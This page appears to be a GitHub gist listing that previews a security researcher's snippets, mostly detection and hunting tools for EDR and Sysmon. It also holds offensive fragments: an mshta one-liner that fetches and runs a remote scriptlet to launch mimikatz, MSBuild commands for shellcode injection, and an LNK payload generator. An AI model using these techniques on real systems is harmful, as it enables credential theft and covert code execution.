Skip to content

Instantly share code, notes, and snippets.

vector-sec / detection.yml
Created May 31, 2022 — forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
View detection.yml
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
vector-sec /
Created Jul 2, 2021 — forked from rc-abodkins/
This script searches binaries within VMware Carbon Black EDR
import argparse
import os
import configparser
import csv
import sys
from os.path import exists
import requests
#Console Output coloring. Makes knowing if you have any errors/ warnings easier to identify
err_Col = '\033[91m'
View gist:0f0e23961ed5eddfce60a9559683ea54
### Keybase proof
I hereby claim:
* I am vector-sec on github.
* I am vector_sec ( on keybase.
* I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611
To claim this, I am signing this object:
vector-sec / mimikatz.sct
Created Jan 18, 2018
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:").Exec(); log coffee exit"
View mimikatz.sct
<?XML version="1.0"?>
View Get-Doppelgangers.ps1
function Get-Doppelgangers
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953
Created Nov 28, 2017
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
View gist:9caa8e14b2adba7ab0c215a6bf856953
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = ""
$hdrs = @{}
$response = Invoke-RestMethod -Uri $url -Headers $hdrs
for($i =0; $i -lt $response.total_results; $i++)
vector-sec / msbuildQueueAPC.csproj
Created Aug 30, 2017
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
View msbuildQueueAPC.csproj
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
vector-sec / Get-Token.ps1
Created Aug 10, 2017
PowerShell script to enumerate all Process and Thread tokens.
View Get-Token.ps1
function Get-Token
foreach($proc in (Get-Process))
if($proc.Id -ne 0 -and $proc.Id -ne 4)
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
View Create-LNK.ps1
function Create-LNKPayload{
Generates a malicous LNK file
Name of the LNK file you want to create.
vector-sec / Get-InjectedThread.ps1
Created May 10, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
Looks for threads that were created as a result of code injection.